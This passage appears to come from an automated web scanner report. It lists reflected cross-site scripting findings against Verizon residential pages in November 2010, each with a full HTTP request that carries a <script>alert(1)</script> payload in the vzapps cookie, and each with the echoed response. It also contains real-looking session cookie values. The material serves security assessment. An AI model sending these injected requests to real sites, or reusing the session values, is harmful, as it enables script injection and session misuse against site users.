Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX4423e<script>alert(1)</script>4bcdea2c76b; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73612
Expires: Sat, 20 Nov 2010 02:01:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:01:21 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:01:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX4423e<script>alert(1)</script>4bcdea2c76b; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:01:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:01:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:01:21 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX4423E<SCRIPT>ALERT(1)</SCRIPT>4BCDEA2C76B </DIV>
...[SNIP]...

1.149. http://www22.verizon.com/ResidentialHelp/HomePage [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/ResidentialHelp/HomePage

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload eefab<script>alert(1)</script>f9f05845c88 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ResidentialHelp/HomePage HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXeefab<script>alert(1)</script>f9f05845c88; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 175807
Expires: Sat, 20 Nov 2010 01:51:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:51:13 GMT
Connection: close

<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong>, TXeefab<script>alert(1)</script>f9f05845c88 </span>
...[SNIP]...

1.150. http://www22.verizon.com/ResidentialHelp/Templates/OverView.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/ResidentialHelp/Templates/OverView.aspx

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 7b494<script>alert(1)</script>afac785228b was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ResidentialHelp/Templates/OverView.aspx?NRMODE=Published&NRNODEGUID=%7bCB971C1D-58DB-4072-97CC-3FEF3528A033%7d&NRORIGINALURL=%2fResidentialhelp%2f&NRCACHEHINT=Guest HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX7b494<script>alert(1)</script>afac785228b; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 175779
Expires: Sat, 20 Nov 2010 01:48:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:48:30 GMT
Connection: close

<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong>, TX7b494<script>alert(1)</script>afac785228b </span>
...[SNIP]...

1.151. http://www22.verizon.com/residential/aboutfios [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/aboutfios

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload ac17a<script>alert(1)</script>5020a67f2e2 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/aboutfios HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXac17a<script>alert(1)</script>5020a67f2e2; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70873
Expires: Sat, 20 Nov 2010 02:41:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:41:21 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:41:20 GMT; path=/
Set-Cookie: ContextInfo_State=TXac17a<script>alert(1)</script>5020a67f2e2; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:41:20 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:41:20 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:41:20 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXAC17A<SCRIPT>ALERT(1)</SCRIPT>5020A67F2E2 </DIV>
...[SNIP]...

1.152. http://www22.verizon.com/residential/aboutfios [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/aboutfios

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 552bf'><script>alert(1)</script>55d73b5ac19 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/aboutfios HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX552bf'><script>alert(1)</script>55d73b5ac19; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70877
Expires: Sat, 20 Nov 2010 02:41:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:41:15 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:41:15 GMT; path=/
Set-Cookie: ContextInfo_State=TX552bf'><script>alert(1)</script>55d73b5ac19; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:41:15 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:41:15 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:41:15 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX552BF'><SCRIPT>ALERT(1)</SCRIPT>55D73B5AC19 ' />
...[SNIP]...

1.153. http://www22.verizon.com/residential/bundles/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 75574'><script>alert(1)</script>10795f1ad69 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX75574'><script>alert(1)</script>10795f1ad69; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 112493
Expires: Sat, 20 Nov 2010 02:20:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:20:56 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:20:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX75574'><script>alert(1)</script>10795f1ad69; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:20:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:20:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:20:56 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX75574'><SCRIPT>ALERT(1)</SCRIPT>10795F1AD69 ' />
...[SNIP]...

1.154. http://www22.verizon.com/residential/bundles/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 819f5<script>alert(1)</script>2af12fc8329 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX819f5<script>alert(1)</script>2af12fc8329; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110947
Expires: Sat, 20 Nov 2010 02:20:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:20:57 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:20:57 GMT; path=/
Set-Cookie: ContextInfo_State=TX819f5<script>alert(1)</script>2af12fc8329; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:20:57 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:20:57 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:20:57 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX819F5<SCRIPT>ALERT(1)</SCRIPT>2AF12FC8329 </DIV>
...[SNIP]...

1.155. http://www22.verizon.com/residential/bundles/LaConexion [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/LaConexion

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload c3ec2<script>alert(1)</script>87b9286082a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/LaConexion HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXc3ec2<script>alert(1)</script>87b9286082a; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 108804
Expires: Sat, 20 Nov 2010 02:31:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:31:33 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:31:33 GMT; path=/
Set-Cookie: ContextInfo_State=TXc3ec2<script>alert(1)</script>87b9286082a; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:31:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:31:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:31:33 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXC3EC2<SCRIPT>ALERT(1)</SCRIPT>87B9286082A </DIV>
...[SNIP]...

1.156. http://www22.verizon.com/residential/bundles/LaConexion [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/LaConexion

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3381e'><script>alert(1)</script>da092e131c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/LaConexion HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX3381e'><script>alert(1)</script>da092e131c; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 108806
Expires: Sat, 20 Nov 2010 02:31:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:31:33 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:31:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX3381e'><script>alert(1)</script>da092e131c; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:31:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:31:33 GMT; path=/
